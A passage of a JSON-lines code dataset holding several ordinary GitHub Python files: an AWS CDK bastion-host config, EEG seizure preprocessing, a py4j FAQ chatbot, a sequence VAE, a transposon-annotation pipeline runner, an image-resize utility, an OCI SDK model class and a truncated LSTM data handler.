{"api_name": "requests.codes", "line_number": 16, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "4330591937", "text": "from getpass import getuser\nfrom ipaddress import IPv4Interface\nfrom typing import List, Optional\n\nimport aws_cdk\nfrom pydantic import BaseSettings, Field, constr, DirectoryPath, FilePath\n\n\nclass Deployment(BaseSettings):\n project: Optional[constr(regex=r\"^[a-z0-9_\\-]+\")]\n client: Optional[str]\n owner: str = Field(\n description=\" \".join(\n [\n \"Name of primary contact for Cloudformation Stack.\",\n \"Used to tag generated resources\",\n \"Defaults to current username.\",\n ]\n ),\n default_factory=getuser,\n )\n stage: str = Field(\n description=\" \".join(\n [\n \"Stage of deployment (e.g. 'dev', 'prod').\",\n \"Used as suffix for stack name.\",\n \"Defaults to current username.\",\n ]\n ),\n default_factory=getuser,\n )\n\n aws_account: str = Field(\n description=\"AWS account used for deployment\",\n env=\"CDK_DEFAULT_ACCOUNT\",\n )\n aws_region: str = Field(\n default=\"us-west-2\",\n description=\"AWS region used for deployment\",\n env=\"CDK_DEFAULT_REGION\",\n )\n\n db_instance_identifier: str = Field(\n description=\"The instance identifier of database to which we want to connect.\"\n )\n\n ipv4_allowlist: List[IPv4Interface] = Field(\n default_factory=lambda: [],\n description=\"IPv4 CIDRs that are allowed SSH access to bastion host.\",\n )\n\n userdata_file: FilePath = Field(default=\"./userdata.yaml\")\n\n ssh_port: int = 22\n\n @property\n def stack_name(self) -> str:\n return f\"{self.project}-{self.stage}-db-bastion\"\n\n @property\n def env(self) -> aws_cdk.Environment:\n return aws_cdk.Environment(\n account=self.aws_account,\n region=self.aws_region,\n )\n", "repo_name": "developmentseed/cdk-rds-bastion-host", "sub_path": "cdk/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pydantic.BaseSettings", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}, {"api_name": "pydantic.constr", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 11, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 12, "usage_type": "call"}, {"api_name": "getpass.getuser", "line_number": 20, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 22, "usage_type": "call"}, {"api_name": "getpass.getuser", "line_number": 30, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 33, "usage_type": "call"}, {"api_name": "pydantic.Field", "line_number": 37, "usage_type": "call"}, {"api_name": "pydantic.Field", "line_number": 43, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 47, "usage_type": "name"}, {"api_name": "ipaddress.IPv4Interface", "line_number": 47, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 47, "usage_type": "call"}, {"api_name": "pydantic.FilePath", "line_number": 52, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 52, "usage_type": "call"}, {"api_name": "aws_cdk.Environment", "line_number": 62, "usage_type": "call"}, {"api_name": "aws_cdk.Environment", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "4310169374", "text": "import numpy as np\nimport h5py\nfrom data.data_utils import *\nimport os\n\n# set seed\nSEED = 123\nnp.random.seed(SEED)\n\n# Define some constants here\noutput_dir = '/share/pi/rubin/siyitang/eeg/input/cv_full'\ntxt_dir = 'data'\nFs = [12, 24, 48, 64, 96]\nWs = [1, 2, 4, 8, 16]\nOs = [0.25, 0.50, 0.75]\nDENSE_PARAMS = []\nfor f in Fs:\n for w in Ws:\n for o in Os:\n DENSE_PARAMS.append([f, w, o])\nTRAIN_INCREASES = len(Fs) * len(Ws) * len(Os)\nprint('Train set increases by {}'.format(TRAIN_INCREASES))\ntest_w = 2\ntest_o = 0.25\nNUM_FOLDS = 5\nSEIZURE_FILE = \"data/seizure_files.txt\"\n\ndef main(num_folds):\n \"\"\"\n Perform feature extraction before-hand.\n Increase the sample size by different combinations of sampling freq, window size & overlap.\n \"\"\"\n for fold_idx in range(num_folds):\n print('Preprocessing for fold{}...'.format(fold_idx))\n train_write_txt = os.path.join(txt_dir,'fold' + str(fold_idx) + '_trainSet_seizure_files.txt')\n test_write_txt = os.path.join(txt_dir, 'fold' + str(fold_idx) + '_testSet_seizure_files.txt')\n \n # Split into train/test, stratified K fold\n file_tuples = parseTxtFiles(SEIZURE_FILE, num_folds=num_folds, fold_idx=fold_idx, cross_val=True)\n train_file_tuples = file_tuples[0]\n test_file_tuples = file_tuples[1]\n \n # Write into a new text file for train set only\n f_train = open(train_write_txt, 'w+')\n for name, sz_class, count in train_file_tuples:\n f_train.write(\"%s,%s,%s\\n\" % (name, sz_class, count))\n f_train.close()\n \n f_test = open(test_write_txt, 'w+')\n for name, sz_class, count in test_file_tuples:\n f_test.write(\"%s,%s,%s\\n\" % (name, sz_class, count))\n f_test.close()\n\n ##### TRAIN SET #####\n features = {} \n for idx in range(len(train_file_tuples)):\n curr_file_name, seizure_class, seizure_idx = train_file_tuples[idx]\n # read file\n f = pyedflib.EdfReader(curr_file_name)\n \n ordered_channels = getOrderedChannels(curr_file_name, False, f.getSignalLabels())\n \n signals = getEDFsignals(f)\n \n frequencies = getSamplingFreq(f, ordered_channels)\n freq = frequencies[0] \n \n seizure_times = getSeizureTimes(curr_file_name, file_type=\"edf\")\n seizure_times = seizure_times[seizure_idx]\n start_t = int(freq * seizure_times[0])\n end_t = int(freq * seizure_times[1])\n curr_signals = signals[:, start_t:end_t]\n \n f._close() \n \n # dense features, only for training split\n dense_feats = []\n for sampling_idx in range(TRAIN_INCREASES):\n dense_param = DENSE_PARAMS[sampling_idx]\n dense_feats.append(denseSampling(ordered_channels, curr_signals, dense_param[0], dense_param[1], dense_param[2]))\n \n write_file_name = curr_file_name + '_' + str(seizure_idx)\n print(write_file_name)\n features[write_file_name] = dense_feats \n\n # Write into h5py file\n train_h5_file = os.path.join(output_dir, 'fold' + str(fold_idx) + '_train_features.h5')\n with h5py.File(train_h5_file, 'w') as hf:\n for key, val in features.items():\n hf.create_dataset(key, data = val)\n \n ##### TEST SET #####\n for idx in range(len(test_file_tuples)):\n curr_file_name, seizure_class, seizure_idx = test_file_tuples[idx]\n # read file\n f = pyedflib.EdfReader(curr_file_name)\n \n ordered_channels = getOrderedChannels(curr_file_name, False, f.getSignalLabels())\n \n signals = getEDFsignals(f)\n \n frequencies = getSamplingFreq(f, ordered_channels)\n freq = frequencies[0] \n \n seizure_times = getSeizureTimes(curr_file_name, file_type=\"edf\")\n seizure_times = seizure_times[seizure_idx]\n start_t = int(freq * seizure_times[0])\n end_t = int(freq * seizure_times[1])\n curr_signals = signals[:, start_t:end_t]\n \n f._close()\n \n write_file_name = curr_file_name + '_' + str(seizure_idx)\n print(write_file_name)\n features[write_file_name] = denseSampling(ordered_channels, curr_signals, 96, test_w, test_o)\n\n # Write into h5py file\n test_h5_file = os.path.join(output_dir, 'fold' + str(fold_idx) + '_test_features.h5')\n with h5py.File(test_h5_file, 'w') as hf:\n for key, val in features.items():\n hf.create_dataset(key, data = val)\n\nif __name__ == '__main__':\n main(NUM_FOLDS)", "repo_name": "DanielLongo/eegML", "sub_path": "tsy935/RubinLab_neurotranslate_eeg-master/eeg/preprocess_cv.py", "file_name": "preprocess_cv.py", "file_ext": "py", "file_size_in_byte": 4880, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "2253115698", "text": "from ChatBot import *\nclass FAQ(object):\n\n\n def __init__(self, question = None ,answer = None):\n self.question = question\n self.answer = answer\n\n #Serilize the String into Pickle File\n def serialize(self):\n serialize()\n\n def setQuestion(self, question = None ):\n self.question = question\n\n def getQuestion(self):\n return self.question\n\n # Chatbot will analysis the question, then return the Answer\n def setAnswer(self, question = None):\n if self.question:\n chatbot = ChatBot()\n print(\"I am here\")\n data = list(faqs.keys())\n with open('faq_feats.pkl', 'rb') as f:\n feats = pickle.load(f)\n input_results = chatbot.input_question(data, feats, self.question)\n new_data = input_results[0]\n new_feats = input_results[1]\n distance_matrix = chatbot.calculate_distances(new_feats)\n idx = 0\n self.answer = chatbot.similarity_text(idx, distance_matrix, new_data)\n else:\n self.answer = \"Please tell me what can I do for you?\"\n\n def getAnswer(self):\n return self.answer\n\n #Connect to the Java File\n class Java:\n implements = [\"py4j.examples.Chatbot\"]\n\n# Make sure that the python code is started first.\n# Then execute: java -cp py4j.jar py4j.examples.SingleThreadClientApplication\nfrom py4j.java_gateway import JavaGateway, CallbackServerParameters\nfaq = FAQ()\n\n#Start the Python Server and Connect Java By Port: 25334 (Default)\ngateway = JavaGateway(callback_server_parameters=CallbackServerParameters(),python_server_entry_point=faq)\n", "repo_name": "DanielProjectJourney/ChatBotFAQ", "sub_path": "Python_Connect_Java_Version/Python/FAQ.py", "file_name": "FAQ.py", "file_ext": "py", "file_size_in_byte": 1656, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "py4j.java_gateway.JavaGateway", "line_number": 49, "usage_type": "call"}, {"api_name": "py4j.java_gateway.CallbackServerParameters", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "36637107355", "text": "\"\"\"Train VAE to reproduce sequence frequencies\n\"\"\"\n\nimport argparse\nfrom torch import save as tsave, load as tload, optim, no_grad, log as tlog, diag\nfrom torch import set_num_threads, cuda, device as tdevice, argmax, randn, float as tfloat\nfrom torch import eye as teye, cat as tcat, zeros as tzeros, no_grad, tensor, randn_like\n\nfrom torch.autograd import set_detect_anomaly\nfrom torch.utils.data import DataLoader\nfrom torch.distributions import MultivariateNormal\n\nfrom .model_vae import VAE_seq\nfrom .seq_io import encode_align, decode_index\n\nfrom numpy import zeros, array, sum as npsum, exp, eye as teye, diag, mean\nfrom numpy.random import uniform\n\nfrom torch.utils.data import Dataset, DataLoader\n\nclass MSA(Dataset):\n\n def __init__(self, seq_list):\n bmsa = encode_align(seq_list)\n self.data = tensor(bmsa, dtype=tfloat)\n\n def __getitem__(self, index):\n return self.data[index]\n\n def __len__(self):\n return len(self.data)\n\n\ndef init_model(len_seq, device=None):\n \"\"\"Default model parameters\n \"\"\"\n nb_state = 21\n dim_node = len_seq * nb_state\n nb_hid = 1\n dim_hid = 2**9\n dim_lat = 2**7\n model = VAE_seq(dim_node, nb_state=nb_state, nb_hid=nb_hid, dim_hid=dim_hid,\n dim_lat=dim_lat, device=device)\n return model\n\n\ndef train_model(seq_list, model, bsize=100, lr=10**-3, nb_iter=100, init_parms=None):\n if init_parms is not None:\n model.load_state_dict(tload(init_parms, map_location=model.dev))\n\n out_file = \"parms/parms_{}.dat\"\n model.train()\n # get the data\n optimizer = optim.Adam(model.parameters(), weight_decay=0.01)\n bin_msa = MSA(seq_list)\n\n loss_epoch = []\n for epoch in range(nb_iter):\n loader = DataLoader(bin_msa, batch_size=bsize, shuffle=True)\n loss_batch = []\n for bi, batch in enumerate(loader):\n optimizer.zero_grad()\n loss = -model(batch)\n loss.backward()\n optimizer.step()\n loss_batch += [loss.item()]\n loss_epoch += [mean(loss_batch)]\n return loss_epoch\n\n\ndef generate_seq(model, nb_seq, no_gap=False, scale_var=1.):\n \"generate random sequences\"\n z_ls = randn(nb_seq, model.dim_lat)\n\n seq = model.decoder(z_ls.float())\n seq = seq.reshape(nb_seq, model.nb_pos, 21)\n\n if no_gap:\n max_p = argmax(seq[:, :, :-1], -1)\n else:\n max_p = argmax(seq, -1)\n\n return decode_index(max_p)\n", "repo_name": "vaiteaopuu/structural_bioinfo", "sub_path": "practicals/src/svd/vae.py", "file_name": "vae.py", "file_ext": "py", "file_size_in_byte": 2436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 21, "usage_type": "name"}, {"api_name": "seq_io.encode_align", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 25, "usage_type": "name"}, {"api_name": "model_vae.VAE_seq", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 81, "usage_type": "call"}, {"api_name": "seq_io.decode_index", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "94447104", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport logging\nimport argparse\n\nfrom grandte.config import *\nfrom grandte.common import check_path, mkdir, read_tsv\nfrom dagflow import DAG, Task, do_dag\n\nLOG = logging.getLogger(__name__)\n__version__ = \"1.0.0\"\n__author__ = (\"Xingguo Zhang\",)\n__email__ = \"invicoun@foxmail.com\"\n__all__ = []\n\n\ndef create_grandTE_task(prefix, genome, job_type, work_dir, out_dir):\n\n task = Task(\n id=\"grandTE_%s\" % prefix,\n work_dir=work_dir,\n type=\"local\",\n option=\"-pe smp 1\",\n script=\"\"\"\n{root}/grandte.py all \\\\\n--prefix {prefix} --genome {genome} \\\\\n--thread 1 --job_type {job_type} \\\\\n--work_dir {work}/{prefix} --out_dir {out}/{prefix}\n\"\"\".format(root=ROOT,\n prefix=prefix,\n genome=genome,\n job_type=job_type,\n work=work_dir,\n out=out_dir\n )\n )\n\n return task\n\n\ndef class_te(tes, job_type, work_dir, out_dir):\n\n task = Task(\n id=\"class\",\n work_dir=work_dir,\n type=job_type,\n option=\"-pe smp 1\",\n script=\"\"\"\n{script}/class_stat_transposon.py {tes}\ncp *_transposon.tsv {out_dir}\n{script}/plot_transposon.py {tes} \nmv all_transposon.png Length_all_transposon.png\nmv all_transposon.pdf Length_all_transposon.pdf\n{script}/plot_transposon.py {tes} --model number\nmv all_transposon.png Number_all_transposon.png\nmv all_transposon.pdf Number_all_transposon.pdf\ncp *_all_transposon.png *_all_transposon.pdf {out_dir}\n\"\"\".format(script=SCRIPTS,\n tes=tes,\n out_dir=out_dir\n )\n )\n\n return task\n\n\ndef run_grand_multi(genomes, work_dir, out_dir, concurrent, refresh, job_type=\"local\"):\n\n work_dir = mkdir(work_dir)\n out_dir = mkdir(out_dir)\n genomes = check_path(genomes)\n\n dag = DAG(\"grand_multi\")\n class_task = class_te(\n tes=os.path.join(out_dir, \"*/06_repeat/*.stat_transposon.tsv\"),\n job_type=job_type,\n work_dir=work_dir,\n out_dir=out_dir\n )\n dag.add_task(class_task)\n\n for line in read_tsv(genomes):\n genome = check_path(line[1])\n task = create_grandTE_task(\n prefix=line[0],\n genome=genome,\n job_type=job_type,\n work_dir=work_dir,\n out_dir=out_dir\n )\n dag.add_task(task)\n class_task.set_upstream(task) \n\n do_dag(dag, concurrent, refresh)\n\n return 0\n\n\ndef grand_multi(args):\n\n run_grand_multi(\n genomes=args.genomes,\n work_dir=args.work_dir,\n out_dir=args.out_dir,\n concurrent=args.concurrent,\n refresh=args.refresh,\n job_type=args.job_type,\n )\n\n\ndef add_grand_multi_args(parser):\n\n parser.add_argument(\"genomes\", metavar='FILE', type=str,\n help=\"Input the genome list.\")\n parser.add_argument(\"--concurrent\", metavar=\"INT\", type=int, default=10,\n help=\"Maximum number of jobs concurrent (default: 10).\")\n parser.add_argument(\"--refresh\", metavar=\"INT\", type=int, default=30,\n help=\"Refresh time of log in seconds (default: 30).\")\n parser.add_argument(\"--job_type\", choices=[\"sge\", \"local\"], default=\"local\",\n help=\"Jobs run on [sge, local] (default: local).\")\n parser.add_argument(\"--work_dir\", metavar=\"DIR\", type=str, default=\".\",\n help=\"Work directory (default: current directory).\")\n parser.add_argument(\"--out_dir\", metavar=\"DIR\", type=str, default=\".\",\n help=\"Output directory (default: current directory).\")\n\n return parser\n\n\ndef main():\n\n logging.basicConfig(\n stream=sys.stderr,\n level=logging.INFO,\n format=\"[%(levelname)s] %(message)s\"\n )\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\nattention:\n grand.py multi genomes.list\nFile format:\nname genome\n\nversion: %s\ncontact: %s <%s>\\\n \"\"\" % (__version__, \" \".join(__author__), __email__))\n\n parser = add_grand_multi_args(parser)\n args = parser.parse_args()\n grand_multi(args)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "zxgsy520/grandTE", "sub_path": "grandte/grand_multi.py", "file_name": "grand_multi.py", "file_ext": "py", "file_size_in_byte": 4082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "dagflow.Task", "line_number": 21, "usage_type": "call"}, {"api_name": "dagflow.Task", "line_number": 45, "usage_type": "call"}, {"api_name": "grandte.common.mkdir", "line_number": 71, "usage_type": "call"}, {"api_name": "grandte.common.mkdir", "line_number": 72, "usage_type": "call"}, {"api_name": "grandte.common.check_path", "line_number": 73, "usage_type": "call"}, {"api_name": "dagflow.DAG", "line_number": 75, "usage_type": "call"}, {"api_name": "grandte.common.read_tsv", "line_number": 84, "usage_type": "call"}, {"api_name": "grandte.common.check_path", "line_number": 85, "usage_type": "call"}, {"api_name": "dagflow.do_dag", "line_number": 96, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 133, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 134, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 135, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 139, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 140, "usage_type": "attribute"}]} +{"seq_id": "40307354114", "text": "import numpy as np\nfrom skimage.transform import resize, SimilarityTransform, warp\nfrom skimage.util import invert\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndef img_resize(img):\n\n #inverting the image\n img = invert(img)\n row, col = img.shape\n pad=400\n tmp = np.zeros((row+2*pad, col+2*pad)).astype(int)\n tmp[pad:pad+row,pad:pad+col] = img\n\n zY, zX = np.where(tmp)\n # bounding rectangle left upper coordinate\n ly, lx = zY.min(), zX.min()\n # bounding rectangle right bottom coordinate\n ry, rx = zY.max(), zX.max()\n\n\n if (rx-lx) < (ry-ly):\n rx = lx+(ry-ly)\n\n if (rx-lx) > (ry-ly):\n ry = ly+(rx-lx)\n\n img = resize(tmp[ly:ry,lx:rx].astype(float), (20, 20))\n # Now inserting the 20x20 image\n tmp = np.zeros((28,28))\n tmp[0:20,0:20] = img\n\n # Calculating translation\n \n Y, X = np.where(tmp)\n R, C = tmp.shape\n\n tsy, tsx = np.round(R/2-Y.mean()), np.round(C/2-X.mean())\n # Moving the digit\n tf = SimilarityTransform(translation=(-tsx, -tsy))\n tmp = warp(tmp, tf)\n tmp = np.round(tmp).astype(int)\n return tmp\n \n \n\n\n\nif __name__ == '__main__':\n \n img = Image.open('test_img/five.png').convert('L')\n img_arr = np.array(img)\n print(img_arr)\n res_img_arr = img_resize(img_arr)\n print(res_img_arr)\n plt.imshow(res_img_arr, cmap=plt.get_cmap('gray'))\n plt.show()\n ", "repo_name": "AshirwadPradhan/Web_App_Digit_Recognizer", "sub_path": "util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "skimage.util.invert", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 16, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 39, "usage_type": "call"}, {"api_name": "skimage.transform.SimilarityTransform", "line_number": 41, "usage_type": "call"}, {"api_name": "skimage.transform.warp", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 52, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.get_cmap", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "31575320729", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass InfluxDetails(object):\n \"\"\"\n Possible data sources\n \"\"\"\n\n #: A constant which can be used with the influx_version property of a InfluxDetails.\n #: This constant has a value of \"V_1_8\"\n INFLUX_VERSION_V_1_8 = \"V_1_8\"\n\n #: A constant which can be used with the influx_version property of a InfluxDetails.\n #: This constant has a value of \"V_2_0\"\n INFLUX_VERSION_V_2_0 = \"V_2_0\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new InfluxDetails object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.ai_anomaly_detection.models.InfluxDetailsV1v8`\n * :class:`~oci.ai_anomaly_detection.models.InfluxDetailsV2v0`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param influx_version:\n The value to assign to the influx_version property of this InfluxDetails.\n Allowed values for this property are: \"V_1_8\", \"V_2_0\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type influx_version: str\n\n \"\"\"\n self.swagger_types = {\n 'influx_version': 'str'\n }\n\n self.attribute_map = {\n 'influx_version': 'influxVersion'\n }\n\n self._influx_version = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['influxVersion']\n\n if type == 'V_1_8':\n return 'InfluxDetailsV1v8'\n\n if type == 'V_2_0':\n return 'InfluxDetailsV2v0'\n else:\n return 'InfluxDetails'\n\n @property\n def influx_version(self):\n \"\"\"\n **[Required]** Gets the influx_version of this InfluxDetails.\n Data source type where actually data asset is being stored\n\n Allowed values for this property are: \"V_1_8\", \"V_2_0\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The influx_version of this InfluxDetails.\n :rtype: str\n \"\"\"\n return self._influx_version\n\n @influx_version.setter\n def influx_version(self, influx_version):\n \"\"\"\n Sets the influx_version of this InfluxDetails.\n Data source type where actually data asset is being stored\n\n\n :param influx_version: The influx_version of this InfluxDetails.\n :type: str\n \"\"\"\n allowed_values = [\"V_1_8\", \"V_2_0\"]\n if not value_allowed_none_or_none_sentinel(influx_version, allowed_values):\n influx_version = 'UNKNOWN_ENUM_VALUE'\n self._influx_version = influx_version\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/ai_anomaly_detection/models/influx_details.py", "file_name": "influx_details.py", "file_ext": "py", "file_size_in_byte": 3465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 88, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 93, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "26876851061", "text": "#!/usr/bin/env python\nimport sys\nimport numpy as np\nfrom scipy.linalg import hankel\n\nif sys.version_info[0] < 3:\n sys.path.append('../src/data_utils')\n import Support as sup\n from DataHandler import *\nelse:\n import src.data_utils.Support as sup\n from src.data_utils.DataHandlerLSTM import *\n\nclass DataHandler_Keras(DataHandlerLSTM):\n def __init__(self, args):\n super().__init__(args)\n self.tbpl = self.prev_horizon+1\n \n # Batches size redefinition\n self.batch_grid = np.zeros((self.batch_size, self.prev_horizon+1, int(self.args.submap_width / self.args.submap_resolution),\n int(self.args.submap_height / self.args.submap_resolution)))\n self.batch_x = np.zeros((self.batch_size, self.prev_horizon+1, self.args.input_dim))\n self.batch_vel = np.zeros((self.batch_size, self.prev_horizon+1, self.args.input_state_dim))\n self.batch_pos = np.zeros((self.batch_size, self.prev_horizon+1, self.args.input_state_dim))\n self.batch_goal = np.zeros((self.batch_size, self.prev_horizon+1, 2))\n self.other_agents_info = np.zeros((self.batch_size, self.prev_horizon+1, self.args.pedestrian_vector_dim))\n self.other_agents_pos = np.zeros((self.batch_size, self.prev_horizon+1, self.args.pedestrian_vector_state_dim))\n self.other_agents_vel = np.zeros((self.batch_size, self.prev_horizon+1, self.args.pedestrian_vector_state_dim))\n self.batch_y = np.zeros((self.batch_size, self.prediction_horizon, self.args.output_dim))\n self.pedestrian_grid = np.zeros([self.batch_size, self.tbpl, self.pedestrian_vector_dim])\n\n def getBatch(self):\n \"\"\"\n \t\tGet the next batch of training data.\n \t\t\"\"\"\n # Update sequences\n # If batch sequences are empty and need to be filled\n trajectory = []\n if len(self.batch_sequences) == 0:\n for b in range(0, min(self.batch_size, len(self.trajectory_set))):\n id, trajectory = self.trajectory_set[self.data_idx]\n self.data_idx += 1\n self.batch_sequences.append(trajectory)\n self.batch_ids.append(id)\n # If batch sequences are filled and can be used or need to be updated.\n other_agents_pos = []\n new_epoch = False\n for ii, traj in enumerate(self.batch_sequences):\n if self.sequence_idx[ii] + self.tbpl + self.output_sequence_length + 1 >= len(traj):\n id, trajectory = self.trajectory_set[self.data_idx]\n self.data_idx = (self.data_idx + 1) % int(len(self.trajectory_set) * self.train_set)\n if self.data_idx == 0:\n new_epoch = True\n self.batch_sequences[ii] = trajectory\n self.batch_ids[ii] = id\n self.sequence_idx[ii] = self.args.prev_horizon\n self.sequence_reset[ii] = 1\n else:\n self.sequence_reset[ii] = 0\n\n # Fill the batch\n other_agents_pos = []\n for ii in range(0, min(self.batch_size, len(self.trajectory_set) - len(self.trajectory_set) % self.batch_size)):\n traj = self.batch_sequences[ii]\n agent_id = self.batch_ids[ii]\n other_agents_pos.append(\n self.fillBatch(agent_id, ii, int(self.sequence_idx[ii]), self.tbpl, self.batch_x, self.batch_vel,\n self.batch_pos, self.batch_grid, self.pedestrian_grid, self.batch_goal, self.batch_y,\n traj, centered_grid=self.centered_grid))\n self.sequence_idx[ii] += self.tbpl\n \n batch = {\n 'x': self.batch_x,\n 'vel': self.batch_vel,\n 'pos': self.batch_pos,\n 'goal': self.batch_goal,\n 'grid': self.batch_grid,\n 'other_agents_info': self.other_agents_info,\n 'y': self.batch_y,\n 'other_agents_pos': self.other_agents_pos,\n 'other_agents_vel': self.other_agents_vel,\n 'new_epoch': new_epoch\n }\n return batch\n\n def fillBatch(self, agent_id, batch_idx, start_idx, truncated_backprop_length, batch_x, batch_vel, batch_pos,\n batch_grid, pedestrian_grid, batch_goal, batch_y, trajectory, centered_grid=False):\n \"\"\"\n\t\t\t\tFill the data batches of batch_idx with data for all truncated backpropagation steps.\n\t\t\t\t\"\"\"\n\n for prev_step in range(self.prev_horizon,-1,-1):\n\n # Input values\n current_pos = np.array([trajectory.pose_vec[start_idx - prev_step, 0], trajectory.pose_vec[start_idx - prev_step, 1]])\n current_vel = np.array([trajectory.vel_vec[start_idx - prev_step, 0] , trajectory.vel_vec[start_idx - prev_step, 1]])\n\n if self.args.normalize_data:\n self.normalize_pos(current_pos)\n self.normalize_vel(current_vel)\n\n batch_x[batch_idx, prev_step, :] = np.array([current_pos[0],current_pos[1],current_vel[0],current_vel[1]])\n batch_vel[batch_idx, prev_step, :] = np.array([current_vel[0],current_vel[1]])\n\n heading = math.atan2(current_vel[1], current_vel[0])\n\n # Find positions of other pedestrians at the current timestep\n other_poses = trajectory.other_agents_positions[start_idx - prev_step]\n other_agents_pos = other_poses\n n_other_agents = other_poses.shape[0]\n if n_other_agents>0:\n other_velocities = trajectory.other_agents_velocities[start_idx - prev_step]\n other_pos_local_frame 